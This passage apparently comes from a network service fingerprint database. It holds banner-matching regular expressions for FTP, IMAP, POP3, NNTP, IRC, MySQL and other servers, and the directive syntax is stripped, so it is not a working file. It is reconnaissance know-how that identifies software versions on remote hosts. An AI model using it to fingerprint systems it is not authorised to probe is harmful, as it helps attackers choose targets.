Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n 